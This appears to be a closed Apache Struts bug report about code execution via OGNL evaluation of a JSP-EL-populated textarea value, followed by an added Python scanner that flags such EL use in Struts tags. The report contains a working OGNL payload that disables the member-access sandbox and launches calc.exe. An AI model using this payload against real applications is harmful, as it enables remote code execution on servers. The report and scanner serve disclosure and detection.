Details
- Bug
- Status: Closed
- Trivial
- Resolution: Won't Fix
- 2.5.30
- None
- None
Description
Hi,
I can run arbitrary code with Struts 2 version 2.5.30.
JSP code:
<s:textarea
label="%{getText('information.message.erreur')}"
id="messageErreurTexte"
name="formInformation.message"
cssClass="input-messageErreur"
value="${pageInformation.message}"
/>
If I write this text in my form's textarea input:
%{(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))}
Whenever the page is displayed, the binary calc.exe is executed.
My generic Struts params:
- struts.ognl.allowStaticMethodAccess = true
- struts.ognl.expressionMaxLength not set
- struts.devMode = false
- struts.ui.theme = simple
Is it normal?
Thanks.
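
An added example, not part of the original report and not Struts project code: a static check that flags Struts tag attributes populated through JSP EL (`${...}`), the pattern in the JSP above, where the stored message reaches the tag as text and, as the report observes, a `%{...}` expression inside it is evaluated. The function names, the `s` taglib prefix, and the `s:if` and `s:textfield` lines in the sample are assumptions made for illustration.

```python
import re

# name="value" or name='value' inside a tag body
ATTR_RE = re.compile(r"""([\w:.-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')""")

def iter_struts_tags(jsp, prefix="s"):
    """Yield (line_no, tag_name, attrs) for each <prefix:tag ...> opening tag."""
    for m in re.finditer(rf"<{re.escape(prefix)}:([A-Za-z]+)", jsp):
        i, quote = m.end(), None
        # Walk to the closing '>' while ignoring any '>' inside quoted values
        while i < len(jsp):
            c = jsp[i]
            if quote:
                if c == quote:
                    quote = None
            elif c in "\"'":
                quote = c
            elif c == ">":
                break
            i += 1
        attrs = {a.group(1): a.group(2) if a.group(2) is not None else a.group(3)
                 for a in ATTR_RE.finditer(jsp[m.end():i])}
        yield jsp.count("\n", 0, m.start()) + 1, m.group(1), attrs

def find_el_in_struts_attrs(jsp, prefix="s"):
    """Return (line, tag, attribute, value) for Struts tag attributes fed by JSP EL."""
    return [(line, tag, name, value)
            for line, tag, attrs in iter_struts_tags(jsp, prefix)
            for name, value in attrs.items()
            if "${" in value]

# Constructed sample: the textarea is the one from the report; the s:if and
# s:textfield lines are made up to exercise the scanner.
SAMPLE_JSP = """\
<s:if test="%{items.size() > 0}">
<s:textarea
label="%{getText('information.message.erreur')}"
id="messageErreurTexte"
name="formInformation.message"
cssClass="input-messageErreur"
value="${pageInformation.message}"
/>
</s:if>
<s:textfield name="formInformation.title" />
"""

if __name__ == "__main__":
    for line, tag, name, value in find_el_in_struts_attrs(SAMPLE_JSP):
        print(f"line {line}: <s:{tag}> attribute {name}={value!r} mixes JSP EL into a Struts tag")
```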